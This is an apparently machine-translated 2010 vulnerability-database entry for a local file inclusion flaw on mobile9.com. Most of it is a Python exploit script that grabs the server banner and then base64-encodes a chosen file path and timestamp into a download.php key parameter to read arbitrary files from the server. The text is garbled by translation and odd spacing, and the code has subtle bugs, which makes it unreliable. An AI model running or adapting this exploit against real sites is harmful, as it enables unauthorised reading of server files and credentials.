mobile9 local file inclusion vulnerability-vulnerability warning-the black bar safety net

2010-01-29T00:00:00
ID MYHACK58:62201026096
Type myhack58
Reporter 佚名
Modified 2010-01-29T00:00:00

Description

Because he is the base64 encoding of the manual testing is very troublesome just wrote a small tool,master drifting

import urllib2,sys import httplib import base64,time

if len(sys. argv) <= 2: print "=" * 3 0 print "mobile9.com local exploit by cnb|rd Qq:4 4 1 3 0 3 2 2 8" print "Email:Linuxrootkit2008@gmail.com" print "=" * 3 0 print print "usage:" + sys. argv[0] + "hostname" + "local file" print sys. exit(1)

host = sys. argv[1] path = sys. argv[2] file = sys. argv[3]

h = httplib. HTTP(host) h. putrequest("HEAD", path) h. putheader("Host", host) h. endheaders() okresp, reason, headers = h. getreply() print "=" * 3 0 print host + "Server Banner is" + headers. get("Server") print "=" * 3 0

print "Local file to read is" + file time = int(time. time()) serverpath = "/download/content_delivery. php? key=" str = str(file) + "|" + str(time) + "|" print str base64file = base64. urlsafe_b64encode(str) requestpath = serverpath + base64file print base64file print requestpath f = httplib. HTTPConnection(host) f. request('GET', requestpath) print f. getresponse(). read() f. close

CSDN blog cnbird2008